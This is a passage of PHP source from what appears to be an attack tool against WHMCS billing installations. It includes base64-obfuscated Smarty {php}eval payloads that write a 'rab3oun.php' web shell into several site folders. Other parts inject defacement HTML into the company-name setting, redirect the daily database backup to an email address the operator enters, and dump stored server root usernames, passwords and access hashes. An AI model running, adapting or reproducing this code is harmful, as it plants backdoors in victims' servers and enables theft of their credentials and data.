YkdVOUoyWnZiblF0YzJsNlpUb2dPSEIwSno1R2FXeGxJR1J2WlhNZ2JtOTBJR1Y0YVhOMElUd3ZabTl1ZEQ0aU93MEtmUTBLWld4elpTQnBaaWdrWDFCUFUxUmJJbk4xWW0xcGRDSmRJRDA5SUNKVFlYWmxJaWtOQ25zTkNpUm1hV3hsWTI5dWRHVnVkSE1nUFNCemRISnBjSE5zWVhOb1pYTW9hSFJ0YkY5bGJuUnBkSGxmWkdWamIyUmxLQ1JmVUU5VFZGc2lZMjl1ZEdWdWRITWlYU2twT3cwS2FXWW9abWxzWlY5bGVHbHpkSE1vSkdacGJHVnVZVzFsS1NrTkNuVnViR2x1YXlna1ptbHNaVzVoYldVcE93MEtKR2hoYm1Sc1pTQTlJR1p2Y0dWdUtDUm1hV3hsYm1GdFpTd2dJbmNpS1RzTkNtbG1LQ0VrYUdGdVpHeGxLUTBLSkhOMFlYUjFjeUE5SUNJOFptOXVkQ0JtWVdObFBTZFdaWEprWVc1aEp5QnpkSGxzWlQwblptOXVkQzF6YVhwbE9pQTRjSFFuUGtOdmRXeGtJRzV2ZENCdmNHVnVJR1pwYkdVZ1ptOXlJSGR5YVhSbElHRmpZMlZ6Y3lFZ1BDOW1iMjUwUGlJN0RRcGxiSE5sRFFwN0RRcHBaaWdoWm5keWFYUmxLQ1JvWVc1a2JHVXNJQ1JtYVd4bFkyOXVkR1Z1ZEhNcEtRMEtKSE4wWVhSMWN5QTlJQ1J6ZEdGMGRYTXVJanhtYjI1MElHWmhZMlU5SjFabGNtUmhibUVuSUhOMGVXeGxQU2RtYjI1MExYTnBlbVU2SURod2RDYytRMjkxYkdRZ2JtOTBJSGR5YVhSbElIUnZJR1pwYkdVaElDaE5ZWGxpWlNCNWIzVWdaR2xrYmlkMElHVnVkR1Z5SUdGdWVTQjBaWGgwUHlrOEwyWnZiblErSWpzTkNtWmpiRzl6WlNna2FHRnVaR3hsS1RzTkNuME5DaVJtYVd4bFkyOXVkR1Z1ZEhNZ1BTQm9kRzFzWlc1MGFYUnBaWE1vSkdacGJHVmpiMjUwWlc1MGN5azdEUXA5RFFwbGJITmxEUXA3RFFva2MzUmhkSFZ6SUQwZ0lqeG1iMjUwSUdaaFkyVTlKMVpsY21SaGJtRW5JSE4wZVd4bFBTZG1iMjUwTFhOcGVtVTZJRGh3ZENjK1RtOGdabWxzWlNCc2IyRmtaV1FoUEM5bWIyNTBQaUk3RFFwOURRby9QZzBLUEhSaFlteGxJR0p2Y21SbGNqMGlNQ0lnWVd4cFoyNDlJbU5sYm5SbGNpSStQSFJ5UGp4MFpENDhkR0ZpYkdVZ2QybGtkR2c5SWpFd01DVWlJR0p2Y21SbGNqMGlNQ0krUEhSeVBqeDBaRDROQ2p4bWIzSnRJRzFsZEdodlpEMGljRzl6ZENJZ1lXTjBhVzl1UFNJOFAwVmphRzhnSkhOamNtbHdkRzVoYldVN1B6NGlQZzBLUEdsdWNIVjBJRzVoYldVOUltWnBiR1Z1WVcxbElpQjBlWEJsUFNKMFpYaDBJaUIyWVd4MVpUMGlQRDlGWTJodklDUm1hV3hsYm1GdFpUcy9QaUlnYzJsNlpUMGlOeklpUGcwS1BHbHVjSFYwSUhSNWNHVTlJbk4xWW0xcGRDSWdibUZ0WlQwaWMzVmliV2wwSWlCMllXeDFaVDBpVDNCbGJpSStEUW84YVc1d2RYUWdkSGx3WlQwaWMzVmliV2wwSWlCdVlXMWxQU0p6ZFdKdGFYUWlJSFpoYkhWbFBTSkVaV3hsZEdVaVBqd3ZkR1ErUEM5MGNqNDhMM1JoWW14bFBnMEtQR1p2Ym5RZ1ptRmpaVDBpVm1WeVpHRnVZU0lnYzNSNWJHVTlJbVp2Ym5RdGMybDZaVG9nTVRGd2RDSStEUW84ZEdWNGRHRnlaV0VnYm1GdFpUMGlZMjl1ZEdWdWRITWlJR052YkhNOUlqY3dJaUJ5YjNkelBTSXlOU0krRFFvOFAwVmphRzhnSkdacGJHVmpiMjUwWlc1MGN6cy9Qand2ZEdWNGRHRnlaV0UrUEM5bWIyNTBQanhpY2o0TkNqeHBibkIxZENCMGVYQmxQU0p6ZFdKdGFYUWlJRzVoYldVOUluTjFZbTFwZENJZ2RtRnNkV1U5SWxOaGRtVWlQZzBLUEdsdWNIVjBJSFI1Y0dVOUluSmxjMlYwSWlCMllXeDFaVDBpVW1WelpYUWlQZzBLUEM5bWIzSnRQZz09Jyk7DQoNCiRmMHAzbiA9IGZvcGVuICgncmFiM291bi5waHAnLCd3Jyk7DQoNCiR3cml0ICA9IGZ3cml0ZSgkZjBwM24gLCAkYzBkZSk7'));
  1109. {/php}</textarea></fieldset>";
  1110. echo"<fieldset><legend>downloads/rab3oun.php</legend><textarea cols='50' rows='10' >{php}eval(base64_decode('JGMwZGUgID0gYmFzZTY0X2RlY29kZSgnUjBsR09EbGhVRHM4Y0NCaGJHbG5iajBpWTJWdWRHVnlJajQ4UHcwS1pYSnliM0pmY21Wd2IzSjBhVzVuS0RBcE93MEtKSE5qY21sd2RHNWhiV1VnUFNBa1gxTkZVbFpGVWxzblUwTlNTVkJVWDA1QlRVVW5YVHNOQ2lSbWFXeGxibUZ0WlNBOUlDUmZVRTlUVkZzaVptbHNaVzVoYldVaVhUc05DbWxtS0NSZlVFOVRWRnNpYzNWaWJXbDBJbDBnUFQwZ0lrOXdaVzRpS1EwS2V3MEthV1lvWm1sc1pWOWxlR2x6ZEhNb0pHWnBiR1Z1WVcxbEtTa05DbnNOQ2lSbWFXeGxZMjl1ZEdWdWRITWdQU0JvZEcxc1pXNTBhWFJwWlhNb1ptbHNaVjluWlhSZlkyOXVkR1Z1ZEhNb0pHWnBiR1Z1WVcxbEtTazdEUXBwWmlnaEpHWnBiR1ZqYjI1MFpXNTBjeWtOQ2lSemRHRjBkWE1nUFNBaVBHWnZiblFnWm1GalpUMG5WbVZ5WkdGdVlTY2djM1I1YkdVOUoyWnZiblF0YzJsNlpUb2dPSEIwSno1RmNuSnZjaUJ2Y2lCT2J5QmpiMjUwWlc1MGN5QnBiaUJtYVd4bFBDOW1iMjUwUGlJN0RRcDlEUXBsYkhObERRb2tjM1JoZEhWeklEMGdJanhtYjI1MElHWmhZMlU5SjFabGNtUmhibUVuSUhOMGVXeGxQU2RtYjI1MExYTnBlbVU2SURod2RDYytSbWxzWlNCa2IyVnpJRzV2ZENCbGVHbHpkQ0U4TDJadmJuUStJanNOQ24wSkNRMEtaV3h6WlNCcFppZ2tYMUJQVTFSYkluTjFZbTFwZENKZElEMDlJQ0pFWld4bGRHVWlLUTBLZXcwS2FXWW9abWxzWlY5bGVHbHpkSE1vSkdacGJHVnVZVzFsS1NrTkNuc05DbWxtS0hWdWJHbHVheWdrWm1sc1pXNWhiV1VwS1FrTkNpUnpkR0YwZFhNZ1BTQWlQR1p2Ym5RZ1ptRmpaVDBuVm1WeVpHRnVZU2NnYzNSNWJHVTlKMlp2Ym5RdGMybDZaVG9nT0hCMEp6NUdhV3hsSUhOMVkyTmxjM05tZFd4c2VTQmtaV3hsZEdWa0lUd3ZabTl1ZEQ0aU93MEtaV3h6WlEwS0pITjBZWFIxY3lBOUlDSThabTl1ZENCbVlXTmxQU2RXWlhKa1lXNWhKeUJ6ZEhsc1pUMG5abTl1ZEMxemFYcGxPaUE0Y0hRblBrTnZkV3hrSUc1dmRDQmtaV3hsZEdVZ1ptbHNaU0U4TDJadmJuUStJanNOQ24wTkNtVnNjMlVOQ2lSemRHRjBkWE1nUFNBaVBHWnZiblFnWm1GalpUMG5WbVZ5WkdGdVlTY2djM1I1YkdVOUoyWnZiblF0YzJsNlpUb2dPSEIwSno1R2FXeGxJR1J2WlhNZ2JtOTBJR1Y0YVhOMElUd3ZabTl1ZEQ0aU93MEtmUTBLWld4elpTQnBaaWdrWDFCUFUxUmJJbk4xWW0xcGRDSmRJRDA5SUNKVFlYWmxJaWtOQ25zTkNpUm1hV3hsWTI5dWRHVnVkSE1nUFNCemRISnBjSE5zWVhOb1pYTW9hSFJ0YkY5bGJuUnBkSGxmWkdWamIyUmxLQ1JmVUU5VFZGc2lZMjl1ZEdWdWRITWlYU2twT3cwS2FXWW9abWxzWlY5bGVHbHpkSE1vSkdacGJHVnVZVzFsS1NrTkNuVnViR2x1YXlna1ptbHNaVzVoYldVcE93MEtKR2hoYm1Sc1pTQTlJR1p2Y0dWdUtDUm1hV3hsYm1GdFpTd2dJbmNpS1RzTkNtbG1LQ0VrYUdGdVpHeGxLUTBLSkhOMFlYUjFjeUE5SUNJOFptOXVkQ0JtWVdObFBTZFdaWEprWVc1aEp5QnpkSGxzWlQwblptOXVkQzF6YVhwbE9pQTRjSFFuUGtOdmRXeGtJRzV2ZENCdmNHVnVJR1pwYkdVZ1ptOXlJSGR5YVhSbElHRmpZMlZ6Y3lFZ1BDOW1iMjUwUGlJN0RRcGxiSE5sRFFwN0RRcHBaaWdoWm5keWFYUmxLQ1JvWVc1a2JHVXNJQ1JtYVd4bFkyOXVkR1Z1ZEhNcEtRMEtKSE4wWVhSMWN5QTlJQ1J6ZEdGMGRYTXVJanhtYjI1MElHWmhZMlU5SjFabGNtUmhibUVuSUhOMGVXeGxQU2RtYjI1MExYTnBlbVU2SURod2RDYytRMjkxYkdRZ2JtOTBJSGR5YVhSbElIUnZJR1pwYkdVaElDaE5ZWGxpWlNCNWIzVWdaR2xrYmlkMElHVnVkR1Z5SUdGdWVTQjBaWGgwUHlrOEwyWnZiblErSWpzTkNtWmpiRzl6WlNna2FHRnVaR3hsS1RzTkNuME5DaVJtYVd4bFkyOXVkR1Z1ZEhNZ1BTQm9kRzFzWlc1MGFYUnBaWE1vSkdacGJHVmpiMjUwWlc1MGN5azdEUXA5RFFwbGJITmxEUXA3RFFva2MzUmhkSFZ6SUQwZ0lqeG1iMjUwSUdaaFkyVTlKMVpsY21SaGJtRW5JSE4wZVd4bFBTZG1iMjUwTFhOcGVtVTZJRGh3ZENjK1RtOGdabWxzWlNCc2IyRmtaV1FoUEM5bWIyNTBQaUk3RFFwOURRby9QZzBLUEhSaFlteGxJR0p2Y21SbGNqMGlNQ0lnWVd4cFoyNDlJbU5sYm5SbGNpSStQSFJ5UGp4MFpENDhkR0ZpYkdVZ2QybGtkR2c5SWpFd01DVWlJR0p2Y21SbGNqMGlNQ0krUEhSeVBqeDBaRDROQ2p4bWIzSnRJRzFsZEdodlpEMGljRzl6ZENJZ1lXTjBhVzl1UFNJOFAwVmphRzhnSkhOamNtbHdkRzVoYldVN1B6NGlQZzBLUEdsdWNIVjBJRzVoYldVOUltWnBiR1Z1WVcxbElpQjBlWEJsUFNKMFpYaDBJaUIyWVd4MVpUMGlQRDlGWTJodklDUm1hV3hsYm1GdFpUcy9QaUlnYzJsNlpUMGlOeklpUGcwS1BHbHVjSFYwSUhSNWNHVTlJbk4xWW0xcGRDSWdibUZ0WlQwaWMzVmliV2wwSWlCMllXeDFaVDBpVDNCbGJpSStEUW84YVc1d2RYUWdkSGx3WlQwaWMzVmliV2wwSWlCdVlXMWxQU0p6ZFdKdGFYUWlJSFpoYkhWbFBTSkVaV3hsZEdVaVBqd3ZkR1ErUEM5MGNqNDhMM1JoWW14bFBnMEtQR1p2Ym5RZ1ptRmpaVDBpVm1WeVpHRnVZU0lnYzNSNWJHVTlJbVp2Ym5RdGMybDZaVG9nTVRGd2RDSStEUW84ZEdWNGRHRnlaV0VnYm1GdFpUMGlZMjl1ZEdWdWRITWlJR052YkhNOUlqY3dJaUJ5YjNkelBTSXlOU0krRFFvOFAwVmphRzhnSkdacGJHVmpiMjUwWlc1MGN6cy9Qand2ZEdWNGRHRnlaV0UrUEM5bWIyNTBQanhpY2o0TkNqeHBibkIxZENCMGVYQmxQU0p6ZFdKdGFYUWlJRzVoYldVOUluTjFZbTFwZENJZ2RtRnNkV1U5SWxOaGRtVWlQZzBLUEdsdWNIVjBJSFI1Y0dVOUluSmxjMlYwSWlCMllXeDFaVDBpVW1WelpYUWlQZzBLUEM5bWIzSnRQZz09Jyk7DQoNCiRmMHAzbiA9IGZvcGVuICgnZG93bmxvYWRzL3JhYjNvdW4ucGhwJywndycpOw0KDQokd3JpdCAgPSBmd3JpdGUoJGYwcDNuICwgJGMwZGUpOw=='));
  1111. {/php}</textarea></fieldset>";
  1112. echo"<fieldset><legend>attachments/rab3oun.php</legend><textarea cols='50' rows='10' >{php}eval(base64_decode('JGMwZGUgID0gYmFzZTY0X2RlY29kZSgnUjBsR09EbGhVRHM4Y0NCaGJHbG5iajBpWTJWdWRHVnlJajQ4UHcwS1pYSnliM0pmY21Wd2IzSjBhVzVuS0RBcE93MEtKSE5qY21sd2RHNWhiV1VnUFNBa1gxTkZVbFpGVWxzblUwTlNTVkJVWDA1QlRVVW5YVHNOQ2lSbWFXeGxibUZ0WlNBOUlDUmZVRTlUVkZzaVptbHNaVzVoYldVaVhUc05DbWxtS0NSZlVFOVRWRnNpYzNWaWJXbDBJbDBnUFQwZ0lrOXdaVzRpS1EwS2V3MEthV1lvWm1sc1pWOWxlR2x6ZEhNb0pHWnBiR1Z1WVcxbEtTa05DbnNOQ2lSbWFXeGxZMjl1ZEdWdWRITWdQU0JvZEcxc1pXNTBhWFJwWlhNb1ptbHNaVjluWlhSZlkyOXVkR1Z1ZEhNb0pHWnBiR1Z1WVcxbEtTazdEUXBwWmlnaEpHWnBiR1ZqYjI1MFpXNTBjeWtOQ2lSemRHRjBkWE1nUFNBaVBHWnZiblFnWm1GalpUMG5WbVZ5WkdGdVlTY2djM1I1YkdVOUoyWnZiblF0YzJsNlpUb2dPSEIwSno1RmNuSnZjaUJ2Y2lCT2J5QmpiMjUwWlc1MGN5QnBiaUJtYVd4bFBDOW1iMjUwUGlJN0RRcDlEUXBsYkhObERRb2tjM1JoZEhWeklEMGdJanhtYjI1MElHWmhZMlU5SjFabGNtUmhibUVuSUhOMGVXeGxQU2RtYjI1MExYTnBlbVU2SURod2RDYytSbWxzWlNCa2IyVnpJRzV2ZENCbGVHbHpkQ0U4TDJadmJuUStJanNOQ24wSkNRMEtaV3h6WlNCcFppZ2tYMUJQVTFSYkluTjFZbTFwZENKZElEMDlJQ0pFWld4bGRHVWlLUTBLZXcwS2FXWW9abWxzWlY5bGVHbHpkSE1vSkdacGJHVnVZVzFsS1NrTkNuc05DbWxtS0hWdWJHbHVheWdrWm1sc1pXNWhiV1VwS1FrTkNpUnpkR0YwZFhNZ1BTQWlQR1p2Ym5RZ1ptRmpaVDBuVm1WeVpHRnVZU2NnYzNSNWJHVTlKMlp2Ym5RdGMybDZaVG9nT0hCMEp6NUdhV3hsSUhOMVkyTmxjM05tZFd4c2VTQmtaV3hsZEdWa0lUd3ZabTl1ZEQ0aU93MEtaV3h6WlEwS0pITjBZWFIxY3lBOUlDSThabTl1ZENCbVlXTmxQU2RXWlhKa1lXNWhKeUJ6ZEhsc1pUMG5abTl1ZEMxemFYcGxPaUE0Y0hRblBrTnZkV3hrSUc1dmRDQmtaV3hsZEdVZ1ptbHNaU0U4TDJadmJuUStJanNOQ24wTkNtVnNjMlVOQ2lSemRHRjBkWE1nUFNBaVBHWnZiblFnWm1GalpUMG5WbVZ5WkdGdVlTY2djM1I1YkdVOUoyWnZiblF0YzJsNlpUb2dPSEIwSno1R2FXeGxJR1J2WlhNZ2JtOTBJR1Y0YVhOMElUd3ZabTl1ZEQ0aU93MEtmUTBLWld4elpTQnBaaWdrWDFCUFUxUmJJbk4xWW0xcGRDSmRJRDA5SUNKVFlYWmxJaWtOQ25zTkNpUm1hV3hsWTI5dWRHVnVkSE1nUFNCemRISnBjSE5zWVhOb1pYTW9hSFJ0YkY5bGJuUnBkSGxmWkdWamIyUmxLQ1JmVUU5VFZGc2lZMjl1ZEdWdWRITWlYU2twT3cwS2FXWW9abWxzWlY5bGVHbHpkSE1vSkdacGJHVnVZVzFsS1NrTkNuVnViR2x1YXlna1ptbHNaVzVoYldVcE93MEtKR2hoYm1Sc1pTQTlJR1p2Y0dWdUtDUm1hV3hsYm1GdFpTd2dJbmNpS1RzTkNtbG1LQ0VrYUdGdVpHeGxLUTBLSkhOMFlYUjFjeUE5SUNJOFptOXVkQ0JtWVdObFBTZFdaWEprWVc1aEp5QnpkSGxzWlQwblptOXVkQzF6YVhwbE9pQTRjSFFuUGtOdmRXeGtJRzV2ZENCdmNHVnVJR1pwYkdVZ1ptOXlJSGR5YVhSbElHRmpZMlZ6Y3lFZ1BDOW1iMjUwUGlJN0RRcGxiSE5sRFFwN0RRcHBaaWdoWm5keWFYUmxLQ1JvWVc1a2JHVXNJQ1JtYVd4bFkyOXVkR1Z1ZEhNcEtRMEtKSE4wWVhSMWN5QTlJQ1J6ZEdGMGRYTXVJanhtYjI1MElHWmhZMlU5SjFabGNtUmhibUVuSUhOMGVXeGxQU2RtYjI1MExYTnBlbVU2SURod2RDYytRMjkxYkdRZ2JtOTBJSGR5YVhSbElIUnZJR1pwYkdVaElDaE5ZWGxpWlNCNWIzVWdaR2xrYmlkMElHVnVkR1Z5SUdGdWVTQjBaWGgwUHlrOEwyWnZiblErSWpzTkNtWmpiRzl6WlNna2FHRnVaR3hsS1RzTkNuME5DaVJtYVd4bFkyOXVkR1Z1ZEhNZ1BTQm9kRzFzWlc1MGFYUnBaWE1vSkdacGJHVmpiMjUwWlc1MGN5azdEUXA5RFFwbGJITmxEUXA3RFFva2MzUmhkSFZ6SUQwZ0lqeG1iMjUwSUdaaFkyVTlKMVpsY21SaGJtRW5JSE4wZVd4bFBTZG1iMjUwTFhOcGVtVTZJRGh3ZENjK1RtOGdabWxzWlNCc2IyRmtaV1FoUEM5bWIyNTBQaUk3RFFwOURRby9QZzBLUEhSaFlteGxJR0p2Y21SbGNqMGlNQ0lnWVd4cFoyNDlJbU5sYm5SbGNpSStQSFJ5UGp4MFpENDhkR0ZpYkdVZ2QybGtkR2c5SWpFd01DVWlJR0p2Y21SbGNqMGlNQ0krUEhSeVBqeDBaRDROQ2p4bWIzSnRJRzFsZEdodlpEMGljRzl6ZENJZ1lXTjBhVzl1UFNJOFAwVmphRzhnSkhOamNtbHdkRzVoYldVN1B6NGlQZzBLUEdsdWNIVjBJRzVoYldVOUltWnBiR1Z1WVcxbElpQjBlWEJsUFNKMFpYaDBJaUIyWVd4MVpUMGlQRDlGWTJodklDUm1hV3hsYm1GdFpUcy9QaUlnYzJsNlpUMGlOeklpUGcwS1BHbHVjSFYwSUhSNWNHVTlJbk4xWW0xcGRDSWdibUZ0WlQwaWMzVmliV2wwSWlCMllXeDFaVDBpVDNCbGJpSStEUW84YVc1d2RYUWdkSGx3WlQwaWMzVmliV2wwSWlCdVlXMWxQU0p6ZFdKdGFYUWlJSFpoYkhWbFBTSkVaV3hsZEdVaVBqd3ZkR1ErUEM5MGNqNDhMM1JoWW14bFBnMEtQR1p2Ym5RZ1ptRmpaVDBpVm1WeVpHRnVZU0lnYzNSNWJHVTlJbVp2Ym5RdGMybDZaVG9nTVRGd2RDSStEUW84ZEdWNGRHRnlaV0VnYm1GdFpUMGlZMjl1ZEdWdWRITWlJR052YkhNOUlqY3dJaUJ5YjNkelBTSXlOU0krRFFvOFAwVmphRzhnSkdacGJHVmpiMjUwWlc1MGN6cy9Qand2ZEdWNGRHRnlaV0UrUEM5bWIyNTBQanhpY2o0TkNqeHBibkIxZENCMGVYQmxQU0p6ZFdKdGFYUWlJRzVoYldVOUluTjFZbTFwZENJZ2RtRnNkV1U5SWxOaGRtVWlQZzBLUEdsdWNIVjBJSFI1Y0dVOUluSmxjMlYwSWlCMllXeDFaVDBpVW1WelpYUWlQZzBLUEM5bWIzSnRQZz09Jyk7DQoNCiRmMHAzbiA9IGZvcGVuICgnYXR0YWNobWVudHMvcmFiM291bi5waHAnLCd3Jyk7DQoNCiR3cml0ICA9IGZ3cml0ZSgkZjBwM24gLCAkYzBkZSk7'));
  1113. {/php}</textarea></fieldset>";
  1114. echo"<fieldset><legend>templates_c/rab3oun.php</legend><textarea cols='50' rows='10' >{php}eval(base64_decode('JGMwZGUgID0gYmFzZTY0X2RlY29kZSgnUjBsR09EbGhVRHM4Y0NCaGJHbG5iajBpWTJWdWRHVnlJajQ4UHcwS1pYSnliM0pmY21Wd2IzSjBhVzVuS0RBcE93MEtKSE5qY21sd2RHNWhiV1VnUFNBa1gxTkZVbFpGVWxzblUwTlNTVkJVWDA1QlRVVW5YVHNOQ2lSbWFXeGxibUZ0WlNBOUlDUmZVRTlUVkZzaVptbHNaVzVoYldVaVhUc05DbWxtS0NSZlVFOVRWRnNpYzNWaWJXbDBJbDBnUFQwZ0lrOXdaVzRpS1EwS2V3MEthV1lvWm1sc1pWOWxlR2x6ZEhNb0pHWnBiR1Z1WVcxbEtTa05DbnNOQ2lSbWFXeGxZMjl1ZEdWdWRITWdQU0JvZEcxc1pXNTBhWFJwWlhNb1ptbHNaVjluWlhSZlkyOXVkR1Z1ZEhNb0pHWnBiR1Z1WVcxbEtTazdEUXBwWmlnaEpHWnBiR1ZqYjI1MFpXNTBjeWtOQ2lSemRHRjBkWE1nUFNBaVBHWnZiblFnWm1GalpUMG5WbVZ5WkdGdVlTY2djM1I1YkdVOUoyWnZiblF0YzJsNlpUb2dPSEIwSno1RmNuSnZjaUJ2Y2lCT2J5QmpiMjUwWlc1MGN5QnBiaUJtYVd4bFBDOW1iMjUwUGlJN0RRcDlEUXBsYkhObERRb2tjM1JoZEhWeklEMGdJanhtYjI1MElHWmhZMlU5SjFabGNtUmhibUVuSUhOMGVXeGxQU2RtYjI1MExYTnBlbVU2SURod2RDYytSbWxzWlNCa2IyVnpJRzV2ZENCbGVHbHpkQ0U4TDJadmJuUStJanNOQ24wSkNRMEtaV3h6WlNCcFppZ2tYMUJQVTFSYkluTjFZbTFwZENKZElEMDlJQ0pFWld4bGRHVWlLUTBLZXcwS2FXWW9abWxzWlY5bGVHbHpkSE1vSkdacGJHVnVZVzFsS1NrTkNuc05DbWxtS0hWdWJHbHVheWdrWm1sc1pXNWhiV1VwS1FrTkNpUnpkR0YwZFhNZ1BTQWlQR1p2Ym5RZ1ptRmpaVDBuVm1WeVpHRnVZU2NnYzNSNWJHVTlKMlp2Ym5RdGMybDZaVG9nT0hCMEp6NUdhV3hsSUhOMVkyTmxjM05tZFd4c2VTQmtaV3hsZEdWa0lUd3ZabTl1ZEQ0aU93MEtaV3h6WlEwS0pITjBZWFIxY3lBOUlDSThabTl1ZENCbVlXTmxQU2RXWlhKa1lXNWhKeUJ6ZEhsc1pUMG5abTl1ZEMxemFYcGxPaUE0Y0hRblBrTnZkV3hrSUc1dmRDQmtaV3hsZEdVZ1ptbHNaU0U4TDJadmJuUStJanNOQ24wTkNtVnNjMlVOQ2lSemRHRjBkWE1nUFNBaVBHWnZiblFnWm1GalpUMG5WbVZ5WkdGdVlTY2djM1I1YkdVOUoyWnZiblF0YzJsNlpUb2dPSEIwSno1R2FXeGxJR1J2WlhNZ2JtOTBJR1Y0YVhOMElUd3ZabTl1ZEQ0aU93MEtmUTBLWld4elpTQnBaaWdrWDFCUFUxUmJJbk4xWW0xcGRDSmRJRDA5SUNKVFlYWmxJaWtOQ25zTkNpUm1hV3hsWTI5dWRHVnVkSE1nUFNCemRISnBjSE5zWVhOb1pYTW9hSFJ0YkY5bGJuUnBkSGxmWkdWamIyUmxLQ1JmVUU5VFZGc2lZMjl1ZEdWdWRITWlYU2twT3cwS2FXWW9abWxzWlY5bGVHbHpkSE1vSkdacGJHVnVZVzFsS1NrTkNuVnViR2x1YXlna1ptbHNaVzVoYldVcE93MEtKR2hoYm1Sc1pTQTlJR1p2Y0dWdUtDUm1hV3hsYm1GdFpTd2dJbmNpS1RzTkNtbG1LQ0VrYUdGdVpHeGxLUTBLSkhOMFlYUjFjeUE5SUNJOFptOXVkQ0JtWVdObFBTZFdaWEprWVc1aEp5QnpkSGxzWlQwblptOXVkQzF6YVhwbE9pQTRjSFFuUGtOdmRXeGtJRzV2ZENCdmNHVnVJR1pwYkdVZ1ptOXlJSGR5YVhSbElHRmpZMlZ6Y3lFZ1BDOW1iMjUwUGlJN0RRcGxiSE5sRFFwN0RRcHBaaWdoWm5keWFYUmxLQ1JvWVc1a2JHVXNJQ1JtYVd4bFkyOXVkR1Z1ZEhNcEtRMEtKSE4wWVhSMWN5QTlJQ1J6ZEdGMGRYTXVJanhtYjI1MElHWmhZMlU5SjFabGNtUmhibUVuSUhOMGVXeGxQU2RtYjI1MExYTnBlbVU2SURod2RDYytRMjkxYkdRZ2JtOTBJSGR5YVhSbElIUnZJR1pwYkdVaElDaE5ZWGxpWlNCNWIzVWdaR2xrYmlkMElHVnVkR1Z5SUdGdWVTQjBaWGgwUHlrOEwyWnZiblErSWpzTkNtWmpiRzl6WlNna2FHRnVaR3hsS1RzTkNuME5DaVJtYVd4bFkyOXVkR1Z1ZEhNZ1BTQm9kRzFzWlc1MGFYUnBaWE1vSkdacGJHVmpiMjUwWlc1MGN5azdEUXA5RFFwbGJITmxEUXA3RFFva2MzUmhkSFZ6SUQwZ0lqeG1iMjUwSUdaaFkyVTlKMVpsY21SaGJtRW5JSE4wZVd4bFBTZG1iMjUwTFhOcGVtVTZJRGh3ZENjK1RtOGdabWxzWlNCc2IyRmtaV1FoUEM5bWIyNTBQaUk3RFFwOURRby9QZzBLUEhSaFlteGxJR0p2Y21SbGNqMGlNQ0lnWVd4cFoyNDlJbU5sYm5SbGNpSStQSFJ5UGp4MFpENDhkR0ZpYkdVZ2QybGtkR2c5SWpFd01DVWlJR0p2Y21SbGNqMGlNQ0krUEhSeVBqeDBaRDROQ2p4bWIzSnRJRzFsZEdodlpEMGljRzl6ZENJZ1lXTjBhVzl1UFNJOFAwVmphRzhnSkhOamNtbHdkRzVoYldVN1B6NGlQZzBLUEdsdWNIVjBJRzVoYldVOUltWnBiR1Z1WVcxbElpQjBlWEJsUFNKMFpYaDBJaUIyWVd4MVpUMGlQRDlGWTJodklDUm1hV3hsYm1GdFpUcy9QaUlnYzJsNlpUMGlOeklpUGcwS1BHbHVjSFYwSUhSNWNHVTlJbk4xWW0xcGRDSWdibUZ0WlQwaWMzVmliV2wwSWlCMllXeDFaVDBpVDNCbGJpSStEUW84YVc1d2RYUWdkSGx3WlQwaWMzVmliV2wwSWlCdVlXMWxQU0p6ZFdKdGFYUWlJSFpoYkhWbFBTSkVaV3hsZEdVaVBqd3ZkR1ErUEM5MGNqNDhMM1JoWW14bFBnMEtQR1p2Ym5RZ1ptRmpaVDBpVm1WeVpHRnVZU0lnYzNSNWJHVTlJbVp2Ym5RdGMybDZaVG9nTVRGd2RDSStEUW84ZEdWNGRHRnlaV0VnYm1GdFpUMGlZMjl1ZEdWdWRITWlJR052YkhNOUlqY3dJaUJ5YjNkelBTSXlOU0krRFFvOFAwVmphRzhnSkdacGJHVmpiMjUwWlc1MGN6cy9Qand2ZEdWNGRHRnlaV0UrUEM5bWIyNTBQanhpY2o0TkNqeHBibkIxZENCMGVYQmxQU0p6ZFdKdGFYUWlJRzVoYldVOUluTjFZbTFwZENJZ2RtRnNkV1U5SWxOaGRtVWlQZzBLUEdsdWNIVjBJSFI1Y0dVOUluSmxjMlYwSWlCMllXeDFaVDBpVW1WelpYUWlQZzBLUEM5bWIzSnRQZz09Jyk7DQoNCiRmMHAzbiA9IGZvcGVuICgndGVtcGxhdGVzX2MvcmFiM291bi5waHAnLCd3Jyk7DQoNCiR3cml0ICA9IGZ3cml0ZSgkZjBwM24gLCAkYzBkZSk7'));
  1115. {/php}</textarea></fieldset>";
  1116. break;
  1117. case 107:echo"<center><h1>Index</h1><br>";
  1118. if($_POST["action"]=="1"){$tryChaning=mysql_query("update `tblconfiguration` set value='</title>".mysql_real_escape_string(stripslashes(nl2br($_POST["index"])))."<DIV style=\"DISPLAY: none\"><xmp>' where setting='CompanyName'")or die("Erreur SQL !".$sql."<br>".mysql_error());
  1119. if($tryChaning){echo"<p class=\"msg done\">Updated successfully </p>";
  1120. }else{echo("<h3  class=\"tit\"><br>Error</h3>");
  1121. }}echo"<form method=\"POST\" action=\"?p=107\" ><textarea name=\"index\" cols='50' rows='10' ></textarea><br><br><input type=\"Submit\" name=\"Submit\" value=\"Submit\"><input type=\"hidden\" name=\"action\" value=\"1\"></form>";
  1122. echo"<br><p class='msg info'> To delete index execute this in sql<br>".htmlentities("update `tblconfiguration` set value='xxxxx' where setting='CompanyName'</p>");
  1123. break;
  1124. case 106:echo"<center><h1>Daily Email Backup</h1><br>";
  1125. if($_POST["action"]=="1"){$tryChaning=mysql_query("Update tblconfiguration set value='".$_POST["email"]."' where setting='DailyEmailBackup'")or die("Erreur SQL !".$sql."<br>".mysql_error());
  1126. if($tryChaning){echo("<p class='msg done'>Updated successfully </p>");
  1127. }else{echo("<h3  class=\"tit\"><br>Error</h3>");
  1128. }}$query0=mysql_query("SELECT value from tblconfiguration where setting='DailyEmailBackup'");
  1129. $v0=mysql_fetch_array($query0);
  1130. echo"<table><tr><td><form method=\"POST\" action=\"?p=106\" ><input type=\"text\" size=60 name=\"email\" value=\"".$v0["value"]."\"></td><td><input type=\"Submit\" name=\"Submit\" value=\"Submit\"><input type=\"hidden\" name=\"action\" value=\"1\"></form></td></tr></table>";
  1131. break;
  1132. case 1:$query=mysql_query("SELECT * FROM tblservers");
  1133. if(!is_array(mysql_fetch_array($query))){echo"<p class=\"msg error\">Nothing Found !</p>";
  1134. }else{echo("<center><h1>H0st r00ts</h1><center><br><br> <br><form action=\"?p=1\" name=\"formw\" method=\"post\">
  1135.  
  1136. <input name=\"export\" type=\"hidden\" value=\"1\">
  1137. <center><input type=\"submit\" name=\"submit2\" class=\"input-submit\" value=\"[Save to TXT file ]\" /></center><br>");
  1138. table("SELECT * FROM tblservers",array("type","active","hostname","ipaddress","username","password","accesshash"));
